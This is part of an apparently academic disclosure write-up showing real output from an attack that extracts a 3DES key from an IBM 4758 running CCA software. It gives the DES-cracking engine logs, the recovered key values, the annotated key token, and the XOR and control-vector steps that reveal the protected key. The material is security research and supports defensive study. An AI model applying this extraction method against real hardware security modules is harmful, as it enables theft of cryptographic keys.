Extracting a 3DES key from an IBM 4758Part 6: Some real resultsThis is some output from a real attack on an IBM 4758 running the CCA software. First we determined the value of a DES key that had been used to encrypt zero: OFFLINE >online DESMIM Engine on COM1 ONLINE >set data 0 t1D4E6 OK0774 t01427 OK0774 ONLINE >runtv r:\variant_data_harvest_09oct.tv Retrieving test vector set from file 'r:\variant_data_harvest_09oct.tv' ................................................................ Total test vectors loaded : 65536 Total number of clashes : 49468 Total unusable test vectors : 0 Loading test vector set into DESMIM engine .0..800..1000..1800..2000..2800..3000..3800..4000..4800..5000..5800..6000..6800. .7000..7800..8000..8800..9000..9800..A000..A800..B000..B800..C000..C800..D000..D 800..E000..E800..F000..F800..10000..10800..11000..11800..12000..12800..13000..13 800..14000..14800..15000..15800..16000..16800..17000..17800..18000..18800..19000 ..19800..1A000..1A800..1B000..1B800..1C000..1C800..1D000..1D800..1E000..1E800..1 F000..1F800. 16384 lots of 2 * 32-bit chunks loaded. Done. rr85A4 OK0774 Wait started at: Tue Oct 9 17:01:43 2001 Run completed at: Wed Oct 10 11:13:22 2001 Result = #73EB2E8955BD46F4, Key = #3EEA4C4CC68CCCC2 With corrected (odd) parity key = #3EEA4C4CC78CCDC2 Result corresponds to key number #E2E6 which is an XORing value of #0000000000068BCC ie: the key really wanted = #3EEA4C4CC78A460E ONLINE > When the attack software was run on the IBM 4758 at "step 6" we had combined what we now know to be a value of #3EEA.4C4C.C78A.460E with #7D00.7D00.0309.0000 (don't ask -- it was just a randomish value chosen from thin air on the 3rd of September (03/09)!). Hence the single DES key that we exported was #43EA314CC483460E and cracking the replicate key used for exporting went like this: OFFLINE >online DESMIM Engine on COM1 ONLINE >set data 43ea314cc483460e t1D4E6 OK0774 t01427 OK0774 ONLINE >runtv r:\variant_exporter_harvest_09oct.tv Retrieving test vector set from file 'r:\variant_exporter_harvest_09oct.tv' ................................................................ Total test vectors loaded : 65536 Total number of clashes : 49432 Total unusable test vectors : 0 Loading test vector set into DESMIM engine .0..800..1000..1800..2000..2800..3000..3800..4000..4800..5000..5800..6000..6800. .7000..7800..8000..8800..9000..9800..A000..A800..B000..B800..C000..C800..D000..D 800..E000..E800..F000..F800..10000..10800..11000..11800..12000..12800..13000..13 800..14000..14800..15000..15800..16000..16800..17000..17800..18000..18800..19000 ..19800..1A000..1A800..1B000..1B800..1C000..1C800..1D000..1D800..1E000..1E800..1 F000..1F800. 16384 lots of 2 * 32-bit chunks loaded. Done. rr85A4 OK0774 Wait started at: Wed Oct 10 18:17:19 2001 Run completed at: Fri Oct 12 06:53:36 2001 Result = #8BA3F18A17504AF0, Key = #B256466EDE78F8B2 With corrected (odd) parity key = #B357466EDF79F8B3 Result corresponds to key number #B95C which is an XORing value of #000000000005E4B8 ie: the key really wanted = #B357466EDF7C1C0B ONLINE > Hence in two cracking sessions of 16 hours and 37 hours we had determined that the 3DES replicate key part was #B357.466E.DF7C.1C0B.B357.466E.DF7C.1C0B and this knowledge allowed us create a non-replicant 3DES key and export any value we wanted. The token that emerged was (we've annotated the fields to show the structure): -START------------------- externaltoken EXTERNAL V0x00 int_ext 02 res1 00 00 00 version 00 res 02 00 flags1 c0 flags 02 00 res 03 00 00 00 00 00 00 00 00 keyleft b3 d7 80 e8 2b f8 4d 59 keyright 3d 0f 65 ff 99 01 29 4a cvkeft 00 41 7d 00 03 41 00 00 cvright 00 41 7d 00 03 21 00 00 res 4 00 00 00 00 00 00 00 00 00 00 00 00 tvv be c6 17 8a -END------------------- The 3DES key we want is "keyleft"."keyright" and is encrypted with a key that we now know the value of. The second (non-replicate) key part we used was: #7D00.7D00.0309.0000.0000.007D.007D.007D (you still should avoid asking why!). Hence we can now calculate the exporter key value: B357466EDF7C1C0B B357466EDF7C1C0B // from the cracker 7D007D0003090000 0000007D007D007D // chosen key part CE573B6EDC751C0B B3574613DF011C76 // these two XORd together We can now decrypt the left and right halves of the key from the token by using this 3DES exporter key. As a final twist, we have to add in a "control vector" for each half (this is part of the key typing mechanism used by the the system and the details are in the CCA documentation).
00417d0003410000 00417d0003410000 // left half control vector CE16466EDF341C0B B3163B13DC401C76 // key XOR LH control vector 00417d0003210000 00417d0003210000 // right half control vector CE16466EDF541C0B B3163B13DC201C76 // key XOR RH control vector We now decrypt each half of the external token, using the completed exporter key (ie: the exporter combined with the relevant control vector) 3DES key = CE16466EDF341C0B B3163B13DC401C76 data = B3D780E82BF84D59 decrypt = 52C1A27975F4A407 3DES key = CE9680E82BD04D59 B396FD9528A44D24 data = 3D0F65FF9901294A decrypt = 1049858C9D433BB5 ie: the valuable key that was encapsulated in the key token and which the attack has now revealed is: #52C1 A279 75F4 A407 1049 858C 9D43 3BB5
Next part: Who are we ?
|